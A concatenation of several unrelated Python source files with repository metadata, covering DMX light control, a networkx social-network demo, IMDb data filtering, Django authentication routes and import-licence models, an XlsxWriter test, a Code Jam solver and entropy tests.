hand_position[1] = int((1 - hand_position[1]/255)*255)
if self.invert:
hand_position[0] = 255 - hand_position[0]
hand_position[1] = 255- hand_position[1]
self.dmx_com.setChannel(self.x_channel,hand_position[0])
self.dmx_com.render()
self.dmx_com.setChannel(self.y_channel,hand_position[1])
self.dmx_com.render()
def change_color(self):
self.color_index = self.color_index+1
if (self.color_index > 8):
self.color_index = 0
self.dmx_com.setChannel(self.color_channel,self.color_table[self.color_index])
self.dmx_com.render()
print "color changed"
def light_intensity(self,grip_strength):
dimmer_value = int((1-grip_strength)*255)
self.dmx_com.setChannel(self.dimmer_channel,dimmer_value)
self.dmx_com.render()
# print dimmer_value
class DMX_Controller_Chained():
    """Drive two chained DMX moving-head lights (right and left hand) that
    share one USB DMX interface.

    Each fixture occupies six consecutive channels starting at its
    start_port: pan (x), tilt (y), colour wheel, gobo, shutter, dimmer.
    """
    def __init__(self, usb_port, start_port_r, start_color_r, start_port_l, start_color_l, invert_r, invert_l):
        self.dmx_com = pysimpledmx.DMXConnection(usb_port)
        # DMX values selecting each slot on the fixtures' colour wheels.
        # (The original assigned this identical table twice.)
        self.color_table = [10, 20, 35, 50, 65, 80, 95, 110, 125]
        # Right-hand fixture.
        self.x_channel_r = start_port_r
        self.y_channel_r = start_port_r + 1
        self.color_channel_r = start_port_r + 2
        self.dimmer_channel_r = start_port_r + 5
        self.color_index_r = start_color_r
        self.invert_r = invert_r
        self.dmx_com.setChannel(self.x_channel_r, 128)
        self.dmx_com.setChannel(self.y_channel_r, 128)
        self.dmx_com.setChannel(self.color_channel_r, self.color_table[self.color_index_r])
        self.dmx_com.setChannel(start_port_r + 3, 5)   # Open gobo
        self.dmx_com.setChannel(start_port_r + 4, 10)  # Open Shutter
        self.dmx_com.setChannel(self.dimmer_channel_r, 255)
        # Left-hand fixture.
        self.x_channel_l = start_port_l
        self.y_channel_l = start_port_l + 1
        self.color_channel_l = start_port_l + 2
        self.dimmer_channel_l = start_port_l + 5
        self.color_index_l = start_color_l
        self.invert_l = invert_l
        self.dmx_com.setChannel(self.x_channel_l, 128)
        self.dmx_com.setChannel(self.y_channel_l, 128)
        self.dmx_com.setChannel(self.color_channel_l, self.color_table[self.color_index_l])
        self.dmx_com.setChannel(start_port_l + 3, 5)   # Open gobo
        self.dmx_com.setChannel(start_port_l + 4, 10)  # Open Shutter
        self.dmx_com.setChannel(self.dimmer_channel_l, 255)
        self.dmx_com.render()
    def _map_hand_position(self, position_data, invert):
        """Map raw hand coordinates to DMX pan/tilt values in [0, 255].

        x is clamped to [-255, 255] then rescaled to [0, 255]; y is clamped
        to [70, 402], rescaled and flipped.  Pure helper extracted from the
        two identical per-hand copies in update_position; arithmetic is
        byte-for-byte the original's.
        """
        x = position_data[0]
        y = position_data[1]
        if x < -255:
            x = -255
        elif x > 255:
            x = 255
        if y < 70:
            y = 70
        elif y > 402:
            y = 402
        x = int((x + 255) / 2.0)
        y = (y - 70) * 0.766
        y = int((1 - y / 255) * 255)
        if invert:
            x = 255 - x
            y = 255 - y
        return [x, y]
    def update_position(self, position_data_r, position_data_l):
        """Point each light at its hand's position: right first, then left."""
        x, y = self._map_hand_position(position_data_r, self.invert_r)
        self.dmx_com.setChannel(self.x_channel_r, x)
        self.dmx_com.render()
        self.dmx_com.setChannel(self.y_channel_r, y)
        self.dmx_com.render()
        x, y = self._map_hand_position(position_data_l, self.invert_l)
        self.dmx_com.setChannel(self.x_channel_l, x)
        self.dmx_com.render()
        self.dmx_com.setChannel(self.y_channel_l, y)
        self.dmx_com.render()
    def change_color(self, isRight):
        """Advance the colour wheel of one fixture (isRight selects which)."""
        if isRight:
            # Modulo generalises the original "> 8 -> 0" wrap to any table size.
            self.color_index_r = (self.color_index_r + 1) % len(self.color_table)
            self.dmx_com.setChannel(self.color_channel_r, self.color_table[self.color_index_r])
            self.dmx_com.render()
            print("Right color changed")  # parenthesised: valid in Python 2 and 3
        else:
            self.color_index_l = (self.color_index_l + 1) % len(self.color_table)
            self.dmx_com.setChannel(self.color_channel_l, self.color_table[self.color_index_l])
            self.dmx_com.render()
            print("Left color changed")
    def light_intensity(self, grip_strength_r, grip_strength_l):
        """Set each dimmer to (1 - grip) * 255, so a stronger grip dims that light."""
        dimmer_value = int((1 - grip_strength_r) * 255)
        self.dmx_com.setChannel(self.dimmer_channel_r, dimmer_value)
        self.dmx_com.render()
        dimmer_value = int((1 - grip_strength_l) * 255)
        self.dmx_com.setChannel(self.dimmer_channel_l, dimmer_value)
        self.dmx_com.render()
"tahaase10@gmail.com"
] | tahaase10@gmail.com |
b64fd5f3af9a2a05ac6bdb4d8311adc85cdf8381 | 46ddd2e23181e5ad4dc0e2960a37379f5865f677 | /7-3_SocialNetwork.py | 0956428a9bcfd79db9f684e5aa84a257ab67d219 | [] | no_license | marekbrzo/PythonDataAnalysisNotes | abbbdd6abb5a9472c1ccdbf3d64b6e983095bfc3 | ba139cb623fbda8e3581c557ced0f1290a830040 | refs/heads/master | 2020-05-05T02:42:08.111646 | 2019-08-10T04:34:43 | 2019-08-10T04:34:43 | 179,647,564 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,850 | py | # Simulating a Social Network
# Three easy steps: 1. Generate graph object and edge list. 2. Assign attributes to graph nodes. 3. Visualize the network
#%%
import numpy as numpy
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sb
import networkx as nx
from pylab import rcParams
#%%
# Global plot defaults for this notebook-style (#%% cell) script.
rcParams['figure.figsize'] = 5,4
sb.set_style('whitegrid')
#%%
# Generating a graph object and edgelist
# gn_graph builds a directed growing-network tree; the fixed seed makes the
# 7-node graph reproducible across runs.
DG = nx.gn_graph(7,seed=25)
for line in nx.generate_edgelist(DG,data = False):
    print(line)
#%%
# Assign attributes to nodes, such as name, weight, directions.
# NOTE(review): DG.node[...] is the pre-2.4 NetworkX attribute API; newer
# releases spell it DG.nodes[...] -- confirm the pinned networkx version.
print(DG.node[0])
#%%
DG.node[0]["name"] = 'Alice'
print(DG.node[0])
#%%
DG.node[1]["name"] = 'Bob'
DG.node[2]["name"] = 'Claire'
DG.node[3]["name"] = 'Dennis'
DG.node[4]["name"] = 'Esther'
DG.node[5]["name"] = 'Frank'
DG.node[6]["name"] = 'George'
#%%
# Other methods to add to the nodes
# add_nodes_from merges the given attribute dicts into the existing nodes.
DG.add_nodes_from([(0,{'age':25}),(1,{'age':31}),(2,{'age':18}),(3,{'age':47}),(4,{'age':22}),(5,{'age':23}),(6,{'age':50})])
print(DG.node[0])
#%%
DG.node[0]["gender"] = 'f'
DG.node[1]["gender"] = 'm'
DG.node[2]["gender"] = 'f'
DG.node[3]["gender"] = 'm'
DG.node[4]["gender"] = 'f'
DG.node[5]["gender"] = 'm'
DG.node[6]["gender"] = 'm'
print(DG.node[0])
#%%
# Draw with numeric node ids first...
nx.draw_circular(DG, node_color = 'bisque', with_labels = True)
#%%
# Labelling the graph
# ...then again with human-readable name labels.
labeldict = {0:'Alice',1:'Bob',2:'Claire',3:'Dennis',4:'Esther',5:'Frank',6:'George'}
nx.draw_circular(DG, node_color = 'bisque', with_labels = True, labels =labeldict)
#%%
# Drop edge direction and redraw with a spectral layout.
G = DG.to_undirected()
nx.draw_spectral(G, node_color = 'bisque', with_labels = True, labels =labeldict)
#%%
# Directional network graphs can tell us who is the most important person in the graph. Once we remove direction then the person become
# the least important | [
"noreply@github.com"
] | marekbrzo.noreply@github.com |
095cfe669aa0d686acc36de7f75e80eed2b7571f | 519ec05d3e86863e334655d79635afa58523a78a | /lib/get_series_imdb.py | 84362c6baa898a386bf3b9bdc0a3492d7a2db10e | [] | no_license | orionwinter/datasets | 56fa8af238849befc4c1251efbef54d2e37c02d9 | 6b2b9c1cd81a8635f54722f16be10187d638c492 | refs/heads/master | 2020-05-21T01:08:58.222562 | 2020-02-14T17:58:10 | 2020-02-14T17:58:10 | 185,849,731 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 522 | py | # coding: utf-8
import pandas as pd
import numpy as np
# Pull the per-episode IMDb ratings table from the public imdb-series repo.
series_imdb = pd.read_csv(
    "https://raw.githubusercontent.com/nazareno/imdb-series/master/data/series_from_imdb.csv"
)
# Keep only the five series of interest, renumber the rows, and retain just
# the columns kept by the original filter.
selected_series = ['Breaking Bad', 'Game of Thrones', 'Vikings', 'Better Call Saul', 'Homeland']
kept_columns = ["series_name", "episode", "series_ep", "season", "season_ep", "user_rating", "user_votes"]
got_e_bb = (
    series_imdb[series_imdb["series_name"].isin(selected_series)]
    .reset_index(drop=True)
    .filter(items=kept_columns)
)
got_e_bb.to_csv("../docs/series_imdb_5_series.csv", index=False)
| [
"orion.winter66@gmail.com"
] | orion.winter66@gmail.com |
5549e1a88fac1ca44072cd16340c142248867b94 | 45444446d97b85859a3b378e00d6a8148e4f2697 | /authentication/urls.py | dbcbad67c900796a95dfac81c2f6c722a8fa7260 | [] | no_license | StepanTita/goli | d89f42d106b8080d0bcf604c77550b603c135f21 | 622b3427fa4c650f8677657c626da1ca5c6cf726 | refs/heads/master | 2022-12-23T09:06:23.545816 | 2020-10-04T11:55:09 | 2020-10-04T11:55:09 | 300,861,949 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 608 | py | from django.urls import path, include
from rest_framework.authtoken import views as auth_views
from django.contrib.auth import views as login_views
from django.views.decorators.csrf import csrf_exempt
from rest_framework.authtoken.views import obtain_auth_token
from authentication import views
# URL routes for the authentication API.
urlpatterns = [
    # path('', include('rest_framework.urls')),
    # DRF token login: POST credentials, receive an auth token.
    path('login/', obtain_auth_token),
    # Session logout; CSRF-exempt so API clients can POST it directly.
    path('logout/', csrf_exempt(login_views.LogoutView.as_view())),
    # NOTE(review): serves the same token view as 'login/' -- confirm both
    # routes are intentional.
    path('token/', auth_views.obtain_auth_token, name='token'),
    path('register/', views.CreateUserAPIView.as_view(), name='register')
]
| [
"stepan.tytarenko@nure.ua"
] | stepan.tytarenko@nure.ua |
37483fd1e0d9006657489d14e97b898faed7670f | 45de7d905486934629730945619f49281ad19359 | /xlsxwriter/test/worksheet/test_cond_format22.py | 4c5f28418e89a70c30d923a17b0cf44b9f5c802f | [
"BSD-2-Clause"
] | permissive | jmcnamara/XlsxWriter | 599e1d225d698120ef931a776a9d93a6f60186ed | ab13807a1be68652ffc512ae6f5791d113b94ee1 | refs/heads/main | 2023-09-04T04:21:04.559742 | 2023-08-31T19:30:52 | 2023-08-31T19:30:52 | 7,433,211 | 3,251 | 712 | BSD-2-Clause | 2023-08-28T18:52:14 | 2013-01-04T01:07:06 | Python | UTF-8 | Python | false | false | 8,726 | py | ###############################################################################
#
# Tests for XlsxWriter.
#
# SPDX-License-Identifier: BSD-2-Clause
# Copyright (c), 2013-2023, John McNamara, jmcnamara@cpan.org
#
import unittest
from io import StringIO
from ..helperfunctions import _xml_to_list
from ...worksheet import Worksheet
class TestAssembleWorksheet(unittest.TestCase):
    """
    Test assembling a complete Worksheet file.
    """
    def test_assemble_xml_file(self):
        """Test writing a worksheet with conditional formatting."""
        # Show full diffs: the expected/actual XML lists are very long.
        self.maxDiff = None
        # Render the worksheet XML into an in-memory buffer.
        fh = StringIO()
        worksheet = Worksheet()
        worksheet._set_filehandle(fh)
        worksheet.select()
        # Seed A1:A9 with the values the icon-set rules are applied to.
        worksheet.write("A1", 1)
        worksheet.write("A2", 2)
        worksheet.write("A3", 3)
        worksheet.write("A4", 4)
        worksheet.write("A5", 5)
        worksheet.write("A6", 6)
        worksheet.write("A7", 7)
        worksheet.write("A8", 8)
        worksheet.write("A9", 9)
        # One icon_set conditional format per cell, covering each of the
        # supported 3-, 4- and 5-icon style names.
        worksheet.conditional_format(
            "A1", {"type": "icon_set", "icon_style": "3_arrows"}
        )
        worksheet.conditional_format(
            "A2", {"type": "icon_set", "icon_style": "3_flags"}
        )
        worksheet.conditional_format(
            "A3", {"type": "icon_set", "icon_style": "3_traffic_lights_rimmed"}
        )
        worksheet.conditional_format(
            "A4", {"type": "icon_set", "icon_style": "3_symbols_circled"}
        )
        worksheet.conditional_format(
            "A5", {"type": "icon_set", "icon_style": "4_arrows"}
        )
        worksheet.conditional_format(
            "A6", {"type": "icon_set", "icon_style": "4_red_to_black"}
        )
        worksheet.conditional_format(
            "A7", {"type": "icon_set", "icon_style": "4_traffic_lights"}
        )
        worksheet.conditional_format(
            "A8", {"type": "icon_set", "icon_style": "5_arrows_gray"}
        )
        worksheet.conditional_format(
            "A9", {"type": "icon_set", "icon_style": "5_quarters"}
        )
        worksheet._assemble_xml_file()
        # Expected output: each rule becomes an Excel iconSet element with
        # evenly spaced percentage thresholds (3 icons: 0/33/67,
        # 4 icons: 0/25/50/75, 5 icons: 0/20/40/60/80).
        exp = _xml_to_list(
            """
            <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
            <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
              <dimension ref="A1:A9"/>
              <sheetViews>
                <sheetView tabSelected="1" workbookViewId="0"/>
              </sheetViews>
              <sheetFormatPr defaultRowHeight="15"/>
              <sheetData>
                <row r="1" spans="1:1">
                  <c r="A1">
                    <v>1</v>
                  </c>
                </row>
                <row r="2" spans="1:1">
                  <c r="A2">
                    <v>2</v>
                  </c>
                </row>
                <row r="3" spans="1:1">
                  <c r="A3">
                    <v>3</v>
                  </c>
                </row>
                <row r="4" spans="1:1">
                  <c r="A4">
                    <v>4</v>
                  </c>
                </row>
                <row r="5" spans="1:1">
                  <c r="A5">
                    <v>5</v>
                  </c>
                </row>
                <row r="6" spans="1:1">
                  <c r="A6">
                    <v>6</v>
                  </c>
                </row>
                <row r="7" spans="1:1">
                  <c r="A7">
                    <v>7</v>
                  </c>
                </row>
                <row r="8" spans="1:1">
                  <c r="A8">
                    <v>8</v>
                  </c>
                </row>
                <row r="9" spans="1:1">
                  <c r="A9">
                    <v>9</v>
                  </c>
                </row>
              </sheetData>
              <conditionalFormatting sqref="A1">
                <cfRule type="iconSet" priority="1">
                  <iconSet iconSet="3Arrows">
                    <cfvo type="percent" val="0"/>
                    <cfvo type="percent" val="33"/>
                    <cfvo type="percent" val="67"/>
                  </iconSet>
                </cfRule>
              </conditionalFormatting>
              <conditionalFormatting sqref="A2">
                <cfRule type="iconSet" priority="2">
                  <iconSet iconSet="3Flags">
                    <cfvo type="percent" val="0"/>
                    <cfvo type="percent" val="33"/>
                    <cfvo type="percent" val="67"/>
                  </iconSet>
                </cfRule>
              </conditionalFormatting>
              <conditionalFormatting sqref="A3">
                <cfRule type="iconSet" priority="3">
                  <iconSet iconSet="3TrafficLights2">
                    <cfvo type="percent" val="0"/>
                    <cfvo type="percent" val="33"/>
                    <cfvo type="percent" val="67"/>
                  </iconSet>
                </cfRule>
              </conditionalFormatting>
              <conditionalFormatting sqref="A4">
                <cfRule type="iconSet" priority="4">
                  <iconSet iconSet="3Symbols">
                    <cfvo type="percent" val="0"/>
                    <cfvo type="percent" val="33"/>
                    <cfvo type="percent" val="67"/>
                  </iconSet>
                </cfRule>
              </conditionalFormatting>
              <conditionalFormatting sqref="A5">
                <cfRule type="iconSet" priority="5">
                  <iconSet iconSet="4Arrows">
                    <cfvo type="percent" val="0"/>
                    <cfvo type="percent" val="25"/>
                    <cfvo type="percent" val="50"/>
                    <cfvo type="percent" val="75"/>
                  </iconSet>
                </cfRule>
              </conditionalFormatting>
              <conditionalFormatting sqref="A6">
                <cfRule type="iconSet" priority="6">
                  <iconSet iconSet="4RedToBlack">
                    <cfvo type="percent" val="0"/>
                    <cfvo type="percent" val="25"/>
                    <cfvo type="percent" val="50"/>
                    <cfvo type="percent" val="75"/>
                  </iconSet>
                </cfRule>
              </conditionalFormatting>
              <conditionalFormatting sqref="A7">
                <cfRule type="iconSet" priority="7">
                  <iconSet iconSet="4TrafficLights">
                    <cfvo type="percent" val="0"/>
                    <cfvo type="percent" val="25"/>
                    <cfvo type="percent" val="50"/>
                    <cfvo type="percent" val="75"/>
                  </iconSet>
                </cfRule>
              </conditionalFormatting>
              <conditionalFormatting sqref="A8">
                <cfRule type="iconSet" priority="8">
                  <iconSet iconSet="5ArrowsGray">
                    <cfvo type="percent" val="0"/>
                    <cfvo type="percent" val="20"/>
                    <cfvo type="percent" val="40"/>
                    <cfvo type="percent" val="60"/>
                    <cfvo type="percent" val="80"/>
                  </iconSet>
                </cfRule>
              </conditionalFormatting>
              <conditionalFormatting sqref="A9">
                <cfRule type="iconSet" priority="9">
                  <iconSet iconSet="5Quarters">
                    <cfvo type="percent" val="0"/>
                    <cfvo type="percent" val="20"/>
                    <cfvo type="percent" val="40"/>
                    <cfvo type="percent" val="60"/>
                    <cfvo type="percent" val="80"/>
                  </iconSet>
                </cfRule>
              </conditionalFormatting>
              <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
            </worksheet>
            """
        )
        got = _xml_to_list(fh.getvalue())
        self.assertEqual(got, exp)
| [
"jmcnamara@cpan.org"
] | jmcnamara@cpan.org |
bce38b1477870007035b59a1dc2f07b2775b04fa | 487ce91881032c1de16e35ed8bc187d6034205f7 | /codes/CodeJamCrawler/16_0_3/Himanshu.Mishra/problem.py | abd5a6a5b627365883042f53a6cc564bc5e737e7 | [] | no_license | DaHuO/Supergraph | 9cd26d8c5a081803015d93cf5f2674009e92ef7e | c88059dc66297af577ad2b8afa4e0ac0ad622915 | refs/heads/master | 2021-06-14T16:07:52.405091 | 2016-08-21T13:39:13 | 2016-08-21T13:39:13 | 49,829,508 | 2 | 0 | null | 2021-03-19T21:55:46 | 2016-01-17T18:23:00 | Python | UTF-8 | Python | false | false | 1,389 | py | def isprime(n):
if n == 2:
return True
if not n & 1:
return False
return pow(2, n-1, n) == 1
# def isprime(n):
# """Returns True if n is prime."""
# if n == 2:
# return True
# if n == 3:
# return True
# if n % 2 == 0:
# return False
# if n % 3 == 0:
# return False
# i = 5
# w = 2
# while i * i <= n:
# if n % i == 0:
# return False
# i += w
# w = 6 - w
# return True
def isDivisibleBy(num):
    """Return the smallest factor of num in [2, num), or None if none exists.

    A composite number's smallest factor never exceeds its square root, so
    trial division can stop at i*i > num.  This returns exactly the same
    values as the original scan over range(2, num) -- the first divisor for
    composites, None for primes and num < 4 -- but far faster for the
    ~32-bit values main() feeds it.
    """
    i = 2
    while i * i <= num:
        if num % i == 0:
            return i
        i += 1
    return None
def main():
    # Search for "jamcoins": binary digit strings that read as a composite
    # number in every base from 2 to 10 (Code Jam 2016 "Coin Jam").
    data = []
    print("Case #1:")
    # data[k] = [2**k + 1, 2**(k+1) - 1]: the inclusive value range whose
    # binary form has k+1 digits and both starts and ends with a 1 bit.
    for i in range(35):
        num = 2**i
        # print(num, len(bin(num)[2:]), bin(num+1)[2:], bin(int(num*2-1))[2:])
        data.append([num+1, int(num*2-1)])
    N = 32
    count = 0
    startingNumber = data[N-1][0]
    finalNumber = data[N-1][1]
    # Step by 2 so every candidate keeps its trailing 1 bit.
    for i in range(startingNumber, finalNumber+1, 2):
        numstr = bin(i)[2:]
        # The candidate's digit string interpreted in bases 2 through 10.
        base = [int(numstr, 2), int(numstr, 3), int(numstr, 4), int(numstr, 5), int(numstr, 6), int(numstr, 7), int(numstr, 8), int(numstr, 9), int(numstr, 10)]
        # print(base)
        # flag ends up 1 only if every interpretation fails isprime()'s
        # Fermat test, i.e. all nine values are composite.
        flag = 0
        for j in base:
            if not isprime(j):
                flag = 1
            else:
                flag = 0
                break
        if flag == 1:
            # Emit at most 700 coins: the digit string (via its base-10
            # reading) followed by one nontrivial divisor per base.
            if count >= 700:
                break
            else:
                count = count + 1
                answer = str(base[10-2])
                for k in base:
                    answer += " " + str(isDivisibleBy(k))
                print(answer)
if __name__ == '__main__':
main() | [
"[dhuo@tcd.ie]"
] | [dhuo@tcd.ie] |
a748b503eca025f4b05eaf27620d517b548809cb | 2c66c1babb836e1c3e18d0f741992485a3e25be3 | /web/domains/application/_import/models.py | aa24f57f9a7f2c63d212837f63a556e422f3ade1 | [] | no_license | PaoloC68/icms | 29a3a980fee4dfb8fc39d9ef47af113fbb140b2d | ec47aa10750072b9df355a2c82f8f5f6471e8157 | refs/heads/master | 2022-11-21T08:29:09.339666 | 2020-02-10T11:23:26 | 2020-02-10T11:23:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,858 | py | from django.db import models
from web.domains.case._import.models import ImportCase
from web.domains.commodity.models import CommodityGroup, CommodityType
from web.domains.country.models import Country, CountryGroup
from web.domains.importer.models import Importer
from web.domains.office.models import Office
from web.domains.template.models import Template
from web.domains.user.models import User
class ImportApplicationType(models.Model):
    """Reference data describing one type of import licence application."""
    is_active = models.BooleanField(null=False, blank=False)
    type_code = models.CharField(max_length=30, null=False, blank=False)
    type = models.CharField(max_length=70, null=False, blank=False)
    sub_type_code = models.CharField(max_length=30, null=False, blank=False)
    sub_type = models.CharField(max_length=70, null=True, blank=True)
    licence_type_code = models.CharField(max_length=20, null=False, blank=False)
    sigl_flag = models.BooleanField(null=False, blank=False)
    chief_flag = models.BooleanField(null=False, blank=False)
    chief_licence_prefix = models.CharField(max_length=10, null=True, blank=True)
    paper_licence_flag = models.BooleanField(null=False, blank=False)
    electronic_licence_flag = models.BooleanField(null=False, blank=False)
    cover_letter_flag = models.BooleanField(null=False, blank=False)
    cover_letter_schedule_flag = models.BooleanField(null=False, blank=False)
    category_flag = models.BooleanField(null=False, blank=False)
    sigl_category_prefix = models.CharField(max_length=100, null=True, blank=True)
    chief_category_prefix = models.CharField(max_length=10, null=True, blank=True)
    default_licence_length_months = models.IntegerField(null=True, blank=True)
    endorsements_flag = models.BooleanField(null=False, blank=False)
    default_commodity_desc = models.CharField(max_length=200, null=True, blank=True)
    quantity_unlimited_flag = models.BooleanField(null=False, blank=False)
    unit_list_csv = models.CharField(max_length=200, null=True, blank=True)
    exp_cert_upload_flag = models.BooleanField(null=False, blank=False)
    supporting_docs_upload_flag = models.BooleanField(null=False, blank=False)
    multiple_commodities_flag = models.BooleanField(null=False, blank=False)
    guidance_file_url = models.CharField(max_length=4000, null=True, blank=True)
    licence_category_description = models.CharField(max_length=1000, null=True, blank=True)
    usage_auto_category_desc_flag = models.BooleanField(null=False, blank=False)
    case_checklist_flag = models.BooleanField(null=False, blank=False)
    importer_printable = models.BooleanField(null=False, blank=False)
    # Country-group links; distinct related_names keep the reverse accessors apart.
    origin_country_group = models.ForeignKey(CountryGroup, on_delete=models.PROTECT, null=True, blank=True, related_name='import_application_types_from')
    consignment_country_group = models.ForeignKey(CountryGroup, on_delete=models.PROTECT, null=True, blank=True, related_name='import_application_types_to')
    master_country_group = models.ForeignKey(CountryGroup, on_delete=models.PROTECT, null=True, blank=True, related_name='import_application_types')
    commodity_type = models.ForeignKey(CommodityType, on_delete=models.PROTECT, null=True, blank=True)
    declaration_template = models.ForeignKey(Template, on_delete=models.PROTECT, null=False, blank=False, related_name='declaration_application_types')
    endorsements = models.ManyToManyField(Template, related_name='endorsement_application_types')
    default_commodity_group = models.ForeignKey(CommodityGroup, on_delete=models.PROTECT, null=True, blank=True)
    def __str__(self):
        """Human-readable label: "Type" or "Type (Sub type)"."""
        label = f'{self.type}'
        return f'{label} ({self.sub_type})' if self.sub_type else label
    class Meta:
        ordering = ('type', 'sub_type')
class ImportApplication(models.Model):
    """One import licence application made by (or on behalf of) an importer."""
    is_active = models.BooleanField(null=False, blank=False, default=True)
    application_type = models.ForeignKey(ImportApplicationType, on_delete=models.PROTECT, null=False, blank=False)
    applicant_reference = models.CharField(max_length=500, null=True, blank=True)
    submit_datetime = models.DateTimeField(null=True, blank=True)
    create_datetime = models.DateTimeField(null=False, blank=False, auto_now_add=True)
    case = models.OneToOneField(ImportCase, on_delete=models.PROTECT, related_name='application', null=True, blank=True)
    submitted_by = models.ForeignKey(User, on_delete=models.PROTECT, null=True, blank=True, related_name='submitted_import_applications')
    created_by = models.ForeignKey(User, on_delete=models.PROTECT, null=False, blank=False, related_name='created_import_applications')
    importer = models.ForeignKey(Importer, on_delete=models.PROTECT, null=False, blank=False, related_name='import_applications')
    agent = models.ForeignKey(Importer, on_delete=models.PROTECT, null=True, blank=True, related_name='agent_import_applications')
    # NOTE(review): importer_office mixes blank=False with null=True as in the
    # original declaration -- confirm that asymmetry is intentional.
    importer_office = models.ForeignKey(Office, on_delete=models.PROTECT, null=True, blank=False, related_name='office_import_applications')
    agent_office = models.ForeignKey(Office, on_delete=models.PROTECT, null=True, blank=True, related_name='agent_office_import_applications')
    contact = models.ForeignKey(User, on_delete=models.PROTECT, null=True, blank=True, related_name='contact_import_applications')
    origin_country = models.ForeignKey(Country, on_delete=models.PROTECT, null=True, blank=True, related_name='import_applications_from')
    consignment_country = models.ForeignKey(Country, on_delete=models.PROTECT, null=True, blank=True, related_name='import_applications_to')
| [
"b@androsaxon.co.uk"
] | b@androsaxon.co.uk |
e18a40f8cbff093d6c6e8d5e541bf41c3d67daa8 | ff4fe07752b61aa6404f85a8b4752e21e8a5bac8 | /challenge-209/spadacciniweb/python/ch-1.py | 88e7289f52bc8ddaa8483854bb105e9772513e22 | [] | no_license | choroba/perlweeklychallenge-club | 7c7127b3380664ca829158f2b6161c2f0153dfd9 | 2b2c6ec6ece04737ba9a572109d5e7072fdaa14a | refs/heads/master | 2023-08-10T08:11:40.142292 | 2023-08-06T20:44:13 | 2023-08-06T20:44:13 | 189,776,839 | 0 | 1 | null | 2019-06-01T20:56:32 | 2019-06-01T20:56:32 | null | UTF-8 | Python | false | false | 1,119 | py | # Task 1: Special Bit Characters
# Submitted by: Mohammad S Anwar
#
# You are given an array of binary bits that ends with 0.
#
# Valid sequences in the bit string are:
#
# [0] -decodes-to-> "a"
# [1, 0] -> "b"
# [1, 1] -> "c"
# Write a script to print 1 if the last character is an “a” otherwise print 0.
#
# Example 1
# Input: @bits = (1, 0, 0)
# Output: 1
#
# The given array bits can be decoded as 2-bits character (10) followed by 1-bit character (0).
#
# Example 2
# Input: @bits = (1, 1, 1, 0)
# Output: 0
#
# Possible decode can be 2-bits character (11) followed by 2-bits character (10) i.e. the last character is not 1-bit character.
import re
import sys
if __name__ == "__main__":
    # Bits come from the command line, e.g. "ch-1.py 1 0 0".
    # NOTE(review): the name "input" shadows the builtin of the same name.
    input = sys.argv[1:]
    # Reject an empty argument list or any token that is not purely 0/1.
    if (len(input) < 1
        or
        len(list(filter(lambda x: re.search(r'[^01]', x), input))) > 0):
        sys.exit("Input error")
    # Greedy decode: a leading 1 consumes two bits ("b"/"c"); a leading 0
    # consumes one bit ("a").
    i = 0
    while i < len(input)-1:
        if (input[i] == '1'):
            i += 1
        i += 1
    # A lone trailing 1 cannot start a valid two-bit character.
    if len(input)-1 == i and input[i] == '1':
        sys.exit("Input error")
    # If the scan stopped exactly on the final bit, that bit decodes alone
    # as "a" (the input is required to end in 0); otherwise it was consumed
    # as the second half of a two-bit character.
    if (len(input) > i):
        print(1)
    else:
        print(0)
| [
"spadacciniweb@gmail.com"
] | spadacciniweb@gmail.com |
fcb2b9c1af9aa02b56bcb31befdd9f08992b561d | 430770c2da5c003d009b2196419180cb3680d07b | /test_code.py | 9d33f85eb34a990a395a9b46dfb6bb587613f8b9 | [
"MIT"
] | permissive | Nick-Bridges/ProcessEntropy | 99611f3a481d092eb53861ab7e62c75f216df54c | f1573d06d5ce5e4079af827712db401e8e3631e8 | refs/heads/master | 2022-12-29T11:47:46.063857 | 2020-10-01T06:14:31 | 2020-10-01T06:14:31 | 300,165,977 | 0 | 0 | MIT | 2020-10-01T06:08:22 | 2020-10-01T06:08:21 | null | UTF-8 | Python | false | false | 2,262 | py | # This is a temporary testing file until I get around to adding an actual testing package.
from ProcessEntropy.SelfEntropy import *
from ProcessEntropy.CrossEntropy import *
def test_self_entropy():
    # Expected per-position match lengths (lambdas) for the sequence below.
    test_input = [1, 2, 3, 4, 5, 1, 2, 3, 3, 4, 5, 4, 4, 1, 2, 3]
    test_output = [0, 1, 1, 1, 1, 4, 3, 2, 4, 3, 2, 2, 2, 4, 3, 2]
    assert (self_entropy_rate(test_input, get_lambdas=True) == test_output).all()
    print(self_entropy_rate(test_input))
def test_cross_entropy():
    # Test find_lambda_jit
    # Match length of the target's prefix against the source sequence.
    assert find_lambda_jit(np.array([5], dtype = int), np.array([1,2,3,4,5,3,2,4], dtype = int) ) == 2
    assert find_lambda_jit(np.array([5,7], dtype = int), np.array([1,2,3,4,5,3,2,4], dtype = int) ) == 2
    assert find_lambda_jit(np.array([5,3,2 ], dtype = int), np.array([1,2,3,4,5,3,2,4], dtype = int) ) == 3
    assert find_lambda_jit(np.array([5,3, 5,5], dtype = int), np.array([1,2,3,4,5,3,2,4], dtype = int) ) == 3
    assert find_lambda_jit(np.array([1,2,3], dtype = int), np.array([1], dtype = int)) == 2
    assert find_lambda_jit(np.array([1,2,3], dtype = int), np.array([], dtype = int) ) == 1
    # Test get_all_lambdas cross entropy
    # indices[i] bounds how much of B is visible when matching A[i:].
    A = np.array([2,1,5,7,8,9,7,8,9,1,2,3,10,10,10], dtype = int)
    B = np.array([1,2,3,4,5,6,7,8,9,1,2,3,4,3,2,1,5], dtype = int)
    indices = np.array([0,0,3,3,9,9,12,12,12,12,12,14,14,14,14], dtype = int)
    L = get_all_lambdas(A,B, indices, np.zeros(len(A)).astype(int))
    assert np.mean(L == np.array([1., 1., 1., 1., 3., 2., 7., 6., 5., 4., 3., 2., 1., 1., 1.])) == 1
    assert np.sum(L) == 39
    # Test main function timeseries_cross_entropy
    # Each tuple is (timestamp, token sequence).
    synth_data_A = [(0,[1,2,3]),(3,[1,2,3,4,5,6,7,6,5,6,5,6]), (5,[4,5,4,5,1,2,3,10,10])]
